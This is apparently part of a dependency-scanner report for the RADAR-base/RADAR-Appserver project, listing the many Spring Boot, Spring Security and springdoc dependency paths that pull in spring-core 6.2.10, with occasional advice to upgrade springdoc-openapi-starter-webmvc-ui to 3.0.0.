Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.springframework.boot:spring-boot-starter-data-jpa@4.1.0-RC1 › org.springframework.boot:spring-boot-data-jpa@4.1.0-RC1 › org.springframework.data:spring-data-jpa@4.1.0-RC1 › org.springframework:spring-aop@6.2.10 › org.springframework:spring-beans@6.2.10 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.springframework.boot:spring-boot-starter-security@4.1.0-RC1 › org.springframework.boot:spring-boot-security@4.1.0-RC1 › org.springframework.security:spring-security-config@7.1.0-RC1 › org.springframework:spring-aop@6.2.10 › org.springframework:spring-beans@6.2.10 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.springframework.boot:spring-boot-starter-security@4.1.0-RC1 › org.springframework.boot:spring-boot-security@4.1.0-RC1 › org.springframework.security:spring-security-web@7.1.0-RC1 › org.springframework:spring-aop@6.2.10 › org.springframework:spring-beans@6.2.10 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.springframework.boot:spring-boot-starter-actuator@4.1.0-RC1 › org.springframework.boot:spring-boot-health@4.1.0-RC1 › org.springframework.boot:spring-boot@4.1.0-RC1 › org.springframework:spring-context@6.0.6 › org.springframework:spring-beans@6.2.10 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.springframework.boot:spring-boot-starter-data-jpa@4.1.0-RC1 › org.springframework.boot:spring-boot-jdbc@4.1.0-RC1 › org.springframework.boot:spring-boot@4.1.0-RC1 › org.springframework:spring-context@6.0.6 › org.springframework:spring-beans@6.2.10 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.springframework.boot:spring-boot-starter-mail@4.1.0-RC1 › org.springframework.boot:spring-boot-mail@4.1.0-RC1 › org.springframework.boot:spring-boot@4.1.0-RC1 › org.springframework:spring-context@6.0.6 › org.springframework:spring-beans@6.2.10 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.springframework.boot:spring-boot-starter-security@4.1.0-RC1 › org.springframework.boot:spring-boot-security@4.1.0-RC1 › org.springframework.boot:spring-boot@4.1.0-RC1 › org.springframework:spring-context@6.0.6 › org.springframework:spring-beans@6.2.10 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.springframework.boot:spring-boot-starter-web@4.1.0-RC1 › org.springframework.boot:spring-boot-http-converter@4.1.0-RC1 › org.springframework.boot:spring-boot@4.1.0-RC1 › org.springframework:spring-context@6.0.6 › org.springframework:spring-beans@6.2.10 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.springdoc:springdoc-openapi-starter-webmvc-ui@2.7.0 › org.springdoc:springdoc-openapi-starter-webmvc-api@2.7.0 › org.springframework:spring-webmvc@7.0.7 › org.springframework:spring-context@6.0.6 › org.springframework:spring-beans@6.2.10 › org.springframework:spring-core@6.2.10Remediation: Upgrade to org.springdoc:springdoc-openapi-starter-webmvc-ui@3.0.0.
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.springframework.boot:spring-boot-starter-web@4.1.0-RC1 › org.springframework.boot:spring-boot-webmvc@4.1.0-RC1 › org.springframework:spring-webmvc@7.0.7 › org.springframework:spring-context@6.0.6 › org.springframework:spring-beans@6.2.10 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.springframework.boot:spring-boot-starter-data-jpa@4.1.0-RC1 › org.springframework.boot:spring-boot-data-jpa@4.1.0-RC1 › org.springframework.data:spring-data-jpa@4.1.0-RC1 › org.springframework:spring-context@6.0.6 › org.springframework:spring-beans@6.2.10 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.springframework.boot:spring-boot-starter-mail@4.1.0-RC1 › org.springframework.boot:spring-boot-mail@4.1.0-RC1 › org.springframework:spring-context-support@7.0.7 › org.springframework:spring-context@6.0.6 › org.springframework:spring-beans@6.2.10 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.springframework.boot:spring-boot-starter-quartz@4.1.0-RC1 › org.springframework.boot:spring-boot-quartz@4.1.0-RC1 › org.springframework:spring-context-support@7.0.7 › org.springframework:spring-context@6.0.6 › org.springframework:spring-beans@6.2.10 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.springframework.boot:spring-boot-starter-security@4.1.0-RC1 › org.springframework.boot:spring-boot-security@4.1.0-RC1 › org.springframework.security:spring-security-config@7.1.0-RC1 › org.springframework:spring-context@6.0.6 › org.springframework:spring-beans@6.2.10 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.springframework.boot:spring-boot-starter-security@4.1.0-RC1 › org.springframework.boot:spring-boot-security@4.1.0-RC1 › org.springframework.security:spring-security-web@7.1.0-RC1 › org.springframework:spring-context@6.0.6 › org.springframework:spring-beans@6.2.10 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.springdoc:springdoc-openapi-starter-webmvc-ui@2.7.0 › org.springdoc:springdoc-openapi-starter-webmvc-api@2.7.0 › org.springframework:spring-webmvc@7.0.7 › org.springframework:spring-web@6.0.6 › org.springframework:spring-beans@6.2.10 › org.springframework:spring-core@6.2.10Remediation: Upgrade to org.springdoc:springdoc-openapi-starter-webmvc-ui@3.0.0.
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.springframework.boot:spring-boot-starter-web@4.1.0-RC1 › org.springframework.boot:spring-boot-webmvc@4.1.0-RC1 › org.springframework:spring-webmvc@7.0.7 › org.springframework:spring-web@6.0.6 › org.springframework:spring-beans@6.2.10 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.springframework.boot:spring-boot-starter-security@4.1.0-RC1 › org.springframework.boot:spring-boot-security@4.1.0-RC1 › org.springframework.security:spring-security-web@7.1.0-RC1 › org.springframework:spring-web@6.0.6 › org.springframework:spring-beans@6.2.10 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.springframework.boot:spring-boot-starter-web@4.1.0-RC1 › org.springframework.boot:spring-boot-webmvc@4.1.0-RC1 › org.springframework.boot:spring-boot-http-converter@4.1.0-RC1 › org.springframework:spring-web@6.0.6 › org.springframework:spring-beans@6.2.10 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.springframework.boot:spring-boot-starter-web@4.1.0-RC1 › org.springframework.boot:spring-boot-webmvc@4.1.0-RC1 › org.springframework.boot:spring-boot-servlet@4.1.0-RC1 › org.springframework:spring-web@6.0.6 › org.springframework:spring-beans@6.2.10 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.springframework.boot:spring-boot-starter-data-jpa@4.1.0-RC1 › org.springframework.boot:spring-boot-jdbc@4.1.0-RC1 › org.springframework.boot:spring-boot-transaction@4.1.0-RC1 › org.springframework:spring-tx@7.0.7 › org.springframework:spring-beans@6.2.10 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.springframework.boot:spring-boot-starter-quartz@4.1.0-RC1 › org.springframework.boot:spring-boot-quartz@4.1.0-RC1 › org.springframework.boot:spring-boot-transaction@4.1.0-RC1 › org.springframework:spring-tx@7.0.7 › org.springframework:spring-beans@6.2.10 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.springframework.boot:spring-boot-starter-data-jpa@4.1.0-RC1 › org.springframework.boot:spring-boot-jdbc@4.1.0-RC1 › org.springframework:spring-jdbc@7.0.7 › org.springframework:spring-tx@7.0.7 › org.springframework:spring-beans@6.2.10 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.springframework.boot:spring-boot-starter-data-jpa@4.1.0-RC1 › org.springframework.boot:spring-boot-data-jpa@4.1.0-RC1 › org.springframework.data:spring-data-jpa@4.1.0-RC1 › org.springframework:spring-tx@7.0.7 › org.springframework:spring-beans@6.2.10 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.springframework.boot:spring-boot-starter-data-jpa@4.1.0-RC1 › org.springframework.boot:spring-boot-data-jpa@4.1.0-RC1 › org.springframework.boot:spring-boot-data-commons@4.1.0-RC1 › org.springframework.data:spring-data-commons@4.1.0-RC1 › org.springframework:spring-beans@6.2.10 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.springframework.boot:spring-boot-starter-data-jpa@4.1.0-RC1 › org.springframework.boot:spring-boot-data-jpa@4.1.0-RC1 › org.springframework.data:spring-data-jpa@4.1.0-RC1 › org.springframework.data:spring-data-commons@4.1.0-RC1 › org.springframework:spring-beans@6.2.10 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.springframework.boot:spring-boot-starter-data-jpa@4.1.0-RC1 › org.springframework.boot:spring-boot-starter-jdbc@4.1.0-RC1 › org.springframework.boot:spring-boot-jdbc@4.1.0-RC1 › org.springframework:spring-jdbc@7.0.7 › org.springframework:spring-beans@6.2.10 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.springframework.boot:spring-boot-starter-data-jpa@4.1.0-RC1 › org.springframework.boot:spring-boot-data-jpa@4.1.0-RC1 › org.springframework.boot:spring-boot-hibernate@4.1.0-RC1 › org.springframework:spring-orm@7.0.7 › org.springframework:spring-beans@6.2.10 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.springframework.boot:spring-boot-starter-data-jpa@4.1.0-RC1 › org.springframework.boot:spring-boot-data-jpa@4.1.0-RC1 › org.springframework.data:spring-data-jpa@4.1.0-RC1 › org.springframework:spring-orm@7.0.7 › org.springframework:spring-beans@6.2.10 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.springframework.boot:spring-boot-starter-security@4.1.0-RC1 › org.springframework.boot:spring-boot-security@4.1.0-RC1 › org.springframework.security:spring-security-config@7.1.0-RC1 › org.springframework.security:spring-security-core@7.1.0-RC1 › org.springframework:spring-beans@6.2.10 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.springframework.boot:spring-boot-starter-security@4.1.0-RC1 › org.springframework.boot:spring-boot-security@4.1.0-RC1 › org.springframework.security:spring-security-web@7.1.0-RC1 › org.springframework.security:spring-security-core@7.1.0-RC1 › org.springframework:spring-beans@6.2.10 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.springframework.boot:spring-boot-starter-actuator@4.1.0-RC1 › org.springframework.boot:spring-boot-health@4.1.0-RC1 › org.springframework.boot:spring-boot@4.1.0-RC1 › org.springframework:spring-context@6.0.6 › org.springframework:spring-aop@6.2.10 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.springframework.boot:spring-boot-starter-data-jpa@4.1.0-RC1 › org.springframework.boot:spring-boot-jdbc@4.1.0-RC1 › org.springframework.boot:spring-boot@4.1.0-RC1 › org.springframework:spring-context@6.0.6 › org.springframework:spring-aop@6.2.10 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.springframework.boot:spring-boot-starter-mail@4.1.0-RC1 › org.springframework.boot:spring-boot-mail@4.1.0-RC1 › org.springframework.boot:spring-boot@4.1.0-RC1 › org.springframework:spring-context@6.0.6 › org.springframework:spring-aop@6.2.10 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.springframework.boot:spring-boot-starter-security@4.1.0-RC1 › org.springframework.boot:spring-boot-security@4.1.0-RC1 › org.springframework.boot:spring-boot@4.1.0-RC1 › org.springframework:spring-context@6.0.6 › org.springframework:spring-aop@6.2.10 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.springframework.boot:spring-boot-starter-web@4.1.0-RC1 › org.springframework.boot:spring-boot-http-converter@4.1.0-RC1 › org.springframework.boot:spring-boot@4.1.0-RC1 › org.springframework:spring-context@6.0.6 › org.springframework:spring-aop@6.2.10 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.springdoc:springdoc-openapi-starter-webmvc-ui@2.7.0 › org.springdoc:springdoc-openapi-starter-webmvc-api@2.7.0 › org.springframework:spring-webmvc@7.0.7 › org.springframework:spring-context@6.0.6 › org.springframework:spring-aop@6.2.10 › org.springframework:spring-core@6.2.10Remediation: Upgrade to org.springdoc:springdoc-openapi-starter-webmvc-ui@3.0.0.
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.springframework.boot:spring-boot-starter-web@4.1.0-RC1 › org.springframework.boot:spring-boot-webmvc@4.1.0-RC1 › org.springframework:spring-webmvc@7.0.7 › org.springframework:spring-context@6.0.6 › org.springframework:spring-aop@6.2.10 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.springframework.boot:spring-boot-starter-data-jpa@4.1.0-RC1 › org.springframework.boot:spring-boot-data-jpa@4.1.0-RC1 › org.springframework.data:spring-data-jpa@4.1.0-RC1 › org.springframework:spring-context@6.0.6 › org.springframework:spring-aop@6.2.10 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.springframework.boot:spring-boot-starter-mail@4.1.0-RC1 › org.springframework.boot:spring-boot-mail@4.1.0-RC1 › org.springframework:spring-context-support@7.0.7 › org.springframework:spring-context@6.0.6 › org.springframework:spring-aop@6.2.10 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.springframework.boot:spring-boot-starter-quartz@4.1.0-RC1 › org.springframework.boot:spring-boot-quartz@4.1.0-RC1 › org.springframework:spring-context-support@7.0.7 › org.springframework:spring-context@6.0.6 › org.springframework:spring-aop@6.2.10 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.springframework.boot:spring-boot-starter-security@4.1.0-RC1 › org.springframework.boot:spring-boot-security@4.1.0-RC1 › org.springframework.security:spring-security-config@7.1.0-RC1 › org.springframework:spring-context@6.0.6 › org.springframework:spring-aop@6.2.10 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.springframework.boot:spring-boot-starter-security@4.1.0-RC1 › org.springframework.boot:spring-boot-security@4.1.0-RC1 › org.springframework.security:spring-security-web@7.1.0-RC1 › org.springframework:spring-context@6.0.6 › org.springframework:spring-aop@6.2.10 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.springframework.boot:spring-boot-starter-security@4.1.0-RC1 › org.springframework.boot:spring-boot-security@4.1.0-RC1 › org.springframework.security:spring-security-config@7.1.0-RC1 › org.springframework.security:spring-security-core@7.1.0-RC1 › org.springframework:spring-aop@6.2.10 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.springframework.boot:spring-boot-starter-security@4.1.0-RC1 › org.springframework.boot:spring-boot-security@4.1.0-RC1 › org.springframework.security:spring-security-web@7.1.0-RC1 › org.springframework.security:spring-security-core@7.1.0-RC1 › org.springframework:spring-aop@6.2.10 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.springframework.boot:spring-boot-starter-actuator@4.1.0-RC1 › org.springframework.boot:spring-boot-health@4.1.0-RC1 › org.springframework.boot:spring-boot@4.1.0-RC1 › org.springframework:spring-context@6.0.6 › org.springframework:spring-expression@6.0.6 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.springframework.boot:spring-boot-starter-data-jpa@4.1.0-RC1 › org.springframework.boot:spring-boot-jdbc@4.1.0-RC1 › org.springframework.boot:spring-boot@4.1.0-RC1 › org.springframework:spring-context@6.0.6 › org.springframework:spring-expression@6.0.6 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.springframework.boot:spring-boot-starter-mail@4.1.0-RC1 › org.springframework.boot:spring-boot-mail@4.1.0-RC1 › org.springframework.boot:spring-boot@4.1.0-RC1 › org.springframework:spring-context@6.0.6 › org.springframework:spring-expression@6.0.6 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.springframework.boot:spring-boot-starter-security@4.1.0-RC1 › org.springframework.boot:spring-boot-security@4.1.0-RC1 › org.springframework.boot:spring-boot@4.1.0-RC1 › org.springframework:spring-context@6.0.6 › org.springframework:spring-expression@6.0.6 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.springframework.boot:spring-boot-starter-web@4.1.0-RC1 › org.springframework.boot:spring-boot-http-converter@4.1.0-RC1 › org.springframework.boot:spring-boot@4.1.0-RC1 › org.springframework:spring-context@6.0.6 › org.springframework:spring-expression@6.0.6 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.springdoc:springdoc-openapi-starter-webmvc-ui@2.7.0 › org.springdoc:springdoc-openapi-starter-webmvc-api@2.7.0 › org.springframework:spring-webmvc@7.0.7 › org.springframework:spring-context@6.0.6 › org.springframework:spring-expression@6.0.6 › org.springframework:spring-core@6.2.10Remediation: Upgrade to org.springdoc:springdoc-openapi-starter-webmvc-ui@3.0.0.
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.springframework.boot:spring-boot-starter-web@4.1.0-RC1 › org.springframework.boot:spring-boot-webmvc@4.1.0-RC1 › org.springframework:spring-webmvc@7.0.7 › org.springframework:spring-context@6.0.6 › org.springframework:spring-expression@6.0.6 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.springframework.boot:spring-boot-starter-data-jpa@4.1.0-RC1 › org.springframework.boot:spring-boot-data-jpa@4.1.0-RC1 › org.springframework.data:spring-data-jpa@4.1.0-RC1 › org.springframework:spring-context@6.0.6 › org.springframework:spring-expression@6.0.6 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.springframework.boot:spring-boot-starter-mail@4.1.0-RC1 › org.springframework.boot:spring-boot-mail@4.1.0-RC1 › org.springframework:spring-context-support@7.0.7 › org.springframework:spring-context@6.0.6 › org.springframework:spring-expression@6.0.6 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.springframework.boot:spring-boot-starter-quartz@4.1.0-RC1 › org.springframework.boot:spring-boot-quartz@4.1.0-RC1 › org.springframework:spring-context-support@7.0.7 › org.springframework:spring-context@6.0.6 › org.springframework:spring-expression@6.0.6 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.springframework.boot:spring-boot-starter-security@4.1.0-RC1 › org.springframework.boot:spring-boot-security@4.1.0-RC1 › org.springframework.security:spring-security-config@7.1.0-RC1 › org.springframework:spring-context@6.0.6 › org.springframework:spring-expression@6.0.6 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.springframework.boot:spring-boot-starter-security@4.1.0-RC1 › org.springframework.boot:spring-boot-security@4.1.0-RC1 › org.springframework.security:spring-security-web@7.1.0-RC1 › org.springframework:spring-context@6.0.6 › org.springframework:spring-expression@6.0.6 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.springframework.boot:spring-boot-starter-security@4.1.0-RC1 › org.springframework.boot:spring-boot-security@4.1.0-RC1 › org.springframework.security:spring-security-config@7.1.0-RC1 › org.springframework.security:spring-security-core@7.1.0-RC1 › org.springframework:spring-expression@6.0.6 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.springframework.boot:spring-boot-starter-security@4.1.0-RC1 › org.springframework.boot:spring-boot-security@4.1.0-RC1 › org.springframework.security:spring-security-web@7.1.0-RC1 › org.springframework.security:spring-security-core@7.1.0-RC1 › org.springframework:spring-expression@6.0.6 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.springframework.boot:spring-boot-starter-actuator@4.1.0-RC1 › org.springframework.boot:spring-boot-actuator-autoconfigure@4.1.0-RC1 › org.springframework.boot:spring-boot-autoconfigure@4.1.0-RC1 › org.springframework.boot:spring-boot@4.1.0-RC1 › org.springframework:spring-context@6.0.6 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.springframework.boot:spring-boot-starter-actuator@4.1.0-RC1 › org.springframework.boot:spring-boot-starter@4.1.0-RC1 › org.springframework.boot:spring-boot-autoconfigure@4.1.0-RC1 › org.springframework.boot:spring-boot@4.1.0-RC1 › org.springframework:spring-context@6.0.6 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.springframework.boot:spring-boot-starter-data-jpa@4.1.0-RC1 › org.springframework.boot:spring-boot-starter@4.1.0-RC1 › org.springframework.boot:spring-boot-autoconfigure@4.1.0-RC1 › org.springframework.boot:spring-boot@4.1.0-RC1 › org.springframework:spring-context@6.0.6 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.springframework.boot:spring-boot-starter-mail@4.1.0-RC1 › org.springframework.boot:spring-boot-starter@4.1.0-RC1 › org.springframework.boot:spring-boot-autoconfigure@4.1.0-RC1 › org.springframework.boot:spring-boot@4.1.0-RC1 › org.springframework:spring-context@6.0.6 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.springframework.boot:spring-boot-starter-quartz@4.1.0-RC1 › org.springframework.boot:spring-boot-starter@4.1.0-RC1 › org.springframework.boot:spring-boot-autoconfigure@4.1.0-RC1 › org.springframework.boot:spring-boot@4.1.0-RC1 › org.springframework:spring-context@6.0.6 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.springframework.boot:spring-boot-starter-security@4.1.0-RC1 › org.springframework.boot:spring-boot-starter@4.1.0-RC1 › org.springframework.boot:spring-boot-autoconfigure@4.1.0-RC1 › org.springframework.boot:spring-boot@4.1.0-RC1 › org.springframework:spring-context@6.0.6 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.springframework.boot:spring-boot-starter-actuator@4.1.0-RC1 › org.springframework.boot:spring-boot-actuator-autoconfigure@4.1.0-RC1 › org.springframework.boot:spring-boot-actuator@4.1.0-RC1 › org.springframework.boot:spring-boot@4.1.0-RC1 › org.springframework:spring-context@6.0.6 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.springframework.boot:spring-boot-starter-actuator@4.1.0-RC1 › org.springframework.boot:spring-boot-starter-micrometer-metrics@4.1.0-RC1 › org.springframework.boot:spring-boot-micrometer-metrics@4.1.0-RC1 › org.springframework.boot:spring-boot@4.1.0-RC1 › org.springframework:spring-context@6.0.6 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.springframework.boot:spring-boot-starter-data-jpa@4.1.0-RC1 › org.springframework.boot:spring-boot-data-jpa@4.1.0-RC1 › org.springframework.boot:spring-boot-data-commons@4.1.0-RC1 › org.springframework.boot:spring-boot@4.1.0-RC1 › org.springframework:spring-context@6.0.6 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.springframework.boot:spring-boot-starter-data-jpa@4.1.0-RC1 › org.springframework.boot:spring-boot-jdbc@4.1.0-RC1 › org.springframework.boot:spring-boot-sql@4.1.0-RC1 › org.springframework.boot:spring-boot@4.1.0-RC1 › org.springframework:spring-context@6.0.6 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.springframework.boot:spring-boot-starter-data-jpa@4.1.0-RC1 › org.springframework.boot:spring-boot-jdbc@4.1.0-RC1 › org.springframework.boot:spring-boot-transaction@4.1.0-RC1 › org.springframework.boot:spring-boot@4.1.0-RC1 › org.springframework:spring-context@6.0.6 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.springframework.boot:spring-boot-starter-quartz@4.1.0-RC1 › org.springframework.boot:spring-boot-quartz@4.1.0-RC1 › org.springframework.boot:spring-boot-transaction@4.1.0-RC1 › org.springframework.boot:spring-boot@4.1.0-RC1 › org.springframework:spring-context@6.0.6 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.springframework.boot:spring-boot-starter-data-jpa@4.1.0-RC1 › org.springframework.boot:spring-boot-starter-jdbc@4.1.0-RC1 › org.springframework.boot:spring-boot-jdbc@4.1.0-RC1 › org.springframework.boot:spring-boot@4.1.0-RC1 › org.springframework:spring-context@6.0.6 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.springframework.boot:spring-boot-starter-web@4.1.0-RC1 › org.springframework.boot:spring-boot-webmvc@4.1.0-RC1 › org.springframework.boot:spring-boot-http-converter@4.1.0-RC1 › org.springframework.boot:spring-boot@4.1.0-RC1 › org.springframework:spring-context@6.0.6 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.springframework.boot:spring-boot-starter-web@4.1.0-RC1 › org.springframework.boot:spring-boot-starter-jackson@4.1.0-RC1 › org.springframework.boot:spring-boot-jackson@4.1.0-RC1 › org.springframework.boot:spring-boot@4.1.0-RC1 › org.springframework:spring-context@6.0.6 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.springframework.boot:spring-boot-starter-web@4.1.0-RC1 › org.springframework.boot:spring-boot-webmvc@4.1.0-RC1 › org.springframework.boot:spring-boot-servlet@4.1.0-RC1 › org.springframework.boot:spring-boot@4.1.0-RC1 › org.springframework:spring-context@6.0.6 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.springframework.boot:spring-boot-starter-security@4.1.0-RC1 › org.springframework.boot:spring-boot-security@4.1.0-RC1 › org.springframework.security:spring-security-config@7.1.0-RC1 › org.springframework.security:spring-security-core@7.1.0-RC1 › org.springframework:spring-context@6.0.6 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.springframework.boot:spring-boot-starter-security@4.1.0-RC1 › org.springframework.boot:spring-boot-security@4.1.0-RC1 › org.springframework.security:spring-security-web@7.1.0-RC1 › org.springframework.security:spring-security-core@7.1.0-RC1 › org.springframework:spring-context@6.0.6 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.springframework.boot:spring-boot-starter-web@4.1.0-RC1 › org.springframework.boot:spring-boot-starter-tomcat@4.1.0-RC1 › org.springframework.boot:spring-boot-tomcat@4.1.0-RC1 › org.springframework.boot:spring-boot-web-server@4.1.0-RC1 › org.springframework:spring-web@6.0.6 › org.springframework:spring-core@6.2.10
-
